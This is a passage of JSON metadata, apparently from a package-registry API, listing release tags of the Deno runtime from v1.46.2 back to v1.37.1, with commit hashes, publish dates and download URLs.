nd/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_